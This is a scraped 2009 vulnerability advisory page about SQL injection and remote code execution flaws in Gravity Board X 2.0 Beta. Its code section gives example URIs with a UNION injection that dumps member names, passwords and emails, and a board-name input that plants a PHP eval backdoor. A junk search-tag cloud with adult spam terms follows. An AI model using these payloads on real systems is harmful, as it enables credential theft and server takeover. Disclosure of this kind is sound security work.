about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Gravity Board X Multiple SQL Injection Vulnerabilities and Remote Command Execution Vulnerability


Title Gravity Board X Multiple SQL Injection Vulnerabilities and Remote Command Execution Vulnerability
Published 2009-04-03-12:00AM
Updated 2009-04-06-06:46PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  brain[pillow]
Vulnerable  Gravity Board X GBX 2.0 Beta
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs and data are available: SQL-injections:http://www.example.com/index.php?action=viewprofile&member_id=slider-http://www.example.com/index.php?action=viewboard&board_id=m0nzt3r-loleg-too'+union+select+0,concat_ws(char(58),displayname,pw,email),2+from+gbx_members+where+1='1Code exec Go: http://www.example.com/index.php?action=configure
Enter Board Name: xXx";if(isset($_GET[c]))eval($_GET[c]);#
Go: http://www.example.com/index.php?ok=phpinfo();
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 16:24:33 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
mohamad_ php vulner oyun antivirus Exploits S rt45t5 Sexy imega Sexiwomen Indiansex. Trisha bat SANIA ask_passwo Dropbear s Www.ibrahi i...=http: Sexvidoe tirishasex www.bollyw fck editor sri lanka Www.isex p 68587114.c /modules/p iitopasixu /ray/plugi tieba.baid asiansexpi Www.nudeme hash md5 sania fake Tirsha+wal Man and Gi Sexpic.com msn hacks phpnbb mcf.php?co 2.4.21-4 com_simple indian sex Www.phoner WWW.JAPANS sex liv 0130 Www asian4 Www.freeam S& web client wwwsex.com fdm e xplo sharon sto